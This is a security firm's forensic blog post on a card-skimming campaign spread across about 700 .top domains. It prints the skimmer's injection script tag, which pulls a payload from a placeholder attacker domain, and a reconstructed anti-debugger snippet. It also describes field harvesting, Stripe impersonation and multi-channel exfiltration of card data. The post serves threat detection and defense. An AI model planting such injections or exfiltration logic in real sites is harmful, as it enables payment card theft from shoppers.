Blog
Forensics
SecurityMetrics Uncovers a Near 700 Site Global Skimming Operation

SecurityMetrics Uncovers a Near 700 Site Global Skimming Operation

SecurityMetrics forensic experts have identified a near 700 site skimming operation using a sophisticated, multi-channel kit designed to lock out analysts and mimic legitimate payment providers.

Forensics
Data Discovery
Data Breaches
Data Security Trends
SecurityMetrics Uncovers a Near 700 Site Global Skimming Operation
Credit card skimming is no longer just about a few lines of messy code. Skimming now resembles intricate, well-planned threat campaigns. 

Recently, the SecurityMetrics Forensic Analysis team identified a massive, synchronized campaign involving 693 credit card skimmers.

What SecurityMetrics Forensic Analysts found beneath the surface was a technically advanced skimmer kit designed to evade detection, impersonate legitimate payment forms, and exfiltrate stolen card data through multiple redundant channels. 

Because of our unique position in the industry, SecurityMetrics is currently the only entity with the data to link these disparate attacks to a single infrastructure fingerprint.

The Infrastructure Fingerprint

This campaign is defined by a highly deliberate infrastructure choice designed for rapid domain rotation and low cost per domain. All 693 malicious domains share a specific registration profile:

  • The TLD: Registered under the .top generic TLD.
  • The Registrar: NiceNIC International Group Co., Limited (IANA #3765), headquartered in Hong Kong.
  • The Mask: All domains resolve through Cloudflare nameservers, giving them the performance benefits and IP-masking properties of a legitimate CDN.

This combination (of cheap .top domains, bulk registration through a single offshore registrar, and Cloudflare as a reverse proxy)provides a veneer of legitimacy, making automated blocklisting difficult. For security teams monitoring traffic, these are the registrar details associated with the threat:

REGISTRAR DETAILS

NiceNIC International Group Co., Limited • IANA #3765 • Hong Kong, China • abuse@nicenic.net

The Injection Method

The skimmer is injected via an external <script> tag, disguised as a site metrics library. The attackers use a site-specific path—the victim’s own domain name as a subdirectory—to give each target its own payload endpoint:

<script type="text/javascript"
  src="https://[maliciousdomain].top/[sitename]/metrics.js"
  id="custom-[timestamp]-js"></script>

The payload is a JavaScript file heavily obfuscated using a control-flow flattening technique with hex-encoded variable names and a rotating string array, making standard signature-based detection nearly impossible.

Technical Analysis: Advanced Evasion

Our forensic deep dive revealed several high-level functions that separate this kit from "run-of-the-mill" malware.

1. Anti-Analysis & DevTools Detection

The skimmer employs a debugger-timing trap to identify if a human analyst is watching. It records a performance.now() timestamp, triggers a debugger; statement, and measures the elapsed time.

If the elapsed time exceeds a threshold (indicating a human paused on the breakpoint in DevTools), the skimmer writes a kill flag to localStorage and terminates execution. On subsequent loads, it checks for this flag and silently exits, effectively "locking out" security researchers from seeing the malicious logic.

// Reconstructed anti-debug logic:
const t1 = performance.now();
debugger;
const t2 = performance.now();
if (t2 - t1 > 100) {
  localStorage.setItem('_debug_flag', '1');
  terminate();  // Skimmer shuts down permanently
}

This means that if a security analyst opens DevTools and steps through the code, the skimmer locks itself out for that browser profile, making casual analysis more difficult and reducing the likelihood of detection during manual review.

2. Form Interception

The kit uses regex-based input field identification to catch data even on non-standard forms, scanning for <input> elements whose placeholder or aria-label attributes match patterns like card, number, expir, mm/yy, cvv, cvc, or security.

3. Stripe Impersonation

To complete the deception, it loads card brand icons directly from Stripe’s CDN (js.stripe.com). By rendering Visa, Mastercard, and other card type icons alongside its own fields using configurable positioning properties (icon size, offset, vertical alignment), it creates a convincing visual match for Stripe-powered checkout forms.

4. DOM Surveillance via MutationObserver

The skimmer deploys multiple MutationObserver across the DOM to detect changes to the checkout page in real time.

This serves two purposes:

  • Re-injection: If the payment form is dynamically reloaded (common in AJAX-updated checkouts), the skimmer re-injects its logic.
  • Restore Logic: If a security tool attempts to remove the injected elements, the skimmer's "restore" logic immediately re-injects the overlay form HTML.

5. Multi-Channel Data Exfiltration

This is where the campaign gets particularly aggressive. It uses a three-tier exfiltration strategy with automatic failover to ensure stolen data reaches the C2 (Command and Control) server:

  1. Primary (WebSocket): The skimmer opens a persistent WebSocket connection to its C2 server. Stolen card data is base64-encoded (via btoa(unescape(encodeURIComponent(JSON.stringify(…))))) and sent over the socket in real time. If the WebSocket is open, data is dispatched immediately and a deduplication check prevents the same card from being exfiltrated twice.
  2. Fallback (navigator.sendBeacon): If the WebSocket is unavailable, the skimmer falls back to the Beacon API. It constructs the exfiltration URL dynamically from the WebSocket address (replacing wss:// with https://) and appends the base64 payload. The Beacon API is designed to survive page navigations, ensuring the data reaches the C2 even if the user clicks away during checkout.
  3. Last Resort (Image/Fetch): If all else fails, there are additional exfiltration paths available including traditional fetch requests and image pixel beacons. The configuration object includes flags for enableWebSocket, enableBeacon, and additional transport options (providing maximum resilience against network-level blocking).

6. Clipboard Hijacking

The skimmer also intercepts paste events on card number fields. When a user pastes a card number, the skimmer captures the clipboard data, strips non-numeric characters, and injects the sanitized number back into the field using document.execCommand('insertText'). This ensures the skimmer captures card numbers even when users paste them from password managers rather than typing them manually.

7. Data Payload Structure

The exfiltrated data object includes the card number, expiration date, CVV, the user’s browser user agent string, and the location.origin of the compromised site. This site-identification field allows the operator to sort stolen credentials by victim merchant, which is essential for a campaign operating across hundreds of targets simultaneously.

Why This Matters

This threat actor campaign isn't just stealing data– it's actually identifying victims. 

The exfiltrated data object includes the user's browser agent and the compromised site's origin, allowing the operator to sort stolen credentials by merchant.

In a landscape where attackers are using professional-grade infrastructure, you need forensic-grade protection. SecurityMetrics consistently monitors and discovers data trends, like this skimming operation, so SecurityMetrics customers can rest assured their data is protected. 

Talk to a SecurityMetrics forensic analyst expert today to protect your sensitive data. 

Related Posts
How to Manage a Data Breach: 5 Steps to Keep Your Business Safe
How to Manage a Healthcare Data Breach
You’ve Been Hacked, Now What? A Step-By-Step Guide
Join thousands of security professionals.
Subscribe Now
Get the guide to PCI Compliance
Download
Get a quote for Incident Response
Request a Quote
Stay up to date
Subscribe to our blog.
Subscribe Now
Data Security
Vulnerability ScanningPenetration TestingSecurity TrainingPANscan®SecurityMetrics VisionSecurityMetrics MobileCIS Controls AssessmentConsultingResellerForensic/Incident ResponseData and Network SecurityData Security AcademyWebpage Integrity Monitoring (WIM)Shopping Cart InspectShopping Cart Monitor (PCI 6.4.3 & 11.6.1)SecurityMetrics Pulse
Compliance
GDPR CompliancePCI CompliancePCI DSS AuditPCI Level 4 ProgramPA-DSS/SSF AuditP2PE AuditPIN Security AssessmentPCI PoliciesPCI TrainingHIPAA ComplianceHIPAA PoliciesHIPAA TrainingHealth Network ProgramHITRUST
CMMC Compliance
Company Info
About UsBlogGlossaryMedia RelationsCareersTerms of UsePrivacyAbuseDo Not Sell My Information
Contact
Contact UsReport a Vulnerability
SecurityMetrics podcast logoLinkedIn logoFacebook logo
© 2026 SecurityMetrics, Inc. All rights reserved.
Privacy PolicyTerms and Conditions
Your IP Address is:
YouTube logoSecurityMetrics podcast logoLinkedIn logoFacebook logo
Subscribe to our blog
Subscribe Now
© 2001–2026 SecurityMetrics, Inc.
All rights reserved.
Privacy Policy
|
Terms and Conditions
|
About us